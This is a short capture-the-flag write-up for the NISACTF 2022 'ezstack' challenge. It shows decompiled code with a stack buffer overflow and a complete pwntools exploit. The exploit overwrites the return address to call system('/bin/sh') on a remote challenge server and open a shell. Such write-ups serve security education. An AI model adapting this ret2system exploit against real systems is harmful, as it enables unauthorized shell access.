NISACTF 2022 ezstack

[NISACTF2022]ezstack

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  shell();
  return 0;
}

shell

ssize_t shell()
{
  char buf; // [esp+0h] [ebp-48h]

  system("echo Welcome to NISACTF");
  return read(0, &buf, 0x60u);
}

shell函数处有溢出

完整exp

from pwn import *
elf = ELF('')
# io = process('')
io = remote('124.221.24.137',28760)
padlength = 0x48 + 0x4
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh)) 
success('[+]system=' + hex(system))
shell = elf.sym['shell']
success('[+]shell=' + hex(shell))
payload = b'a' * padlength + p32(system) + p32(bin_sh)
io.sendline(payload)
io.interactive()

posted @ 2022-05-10 22:31 dotExp 阅读(350) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

dotExp

NISACTF 2022 ezstack

[NISACTF2022]ezstack

公告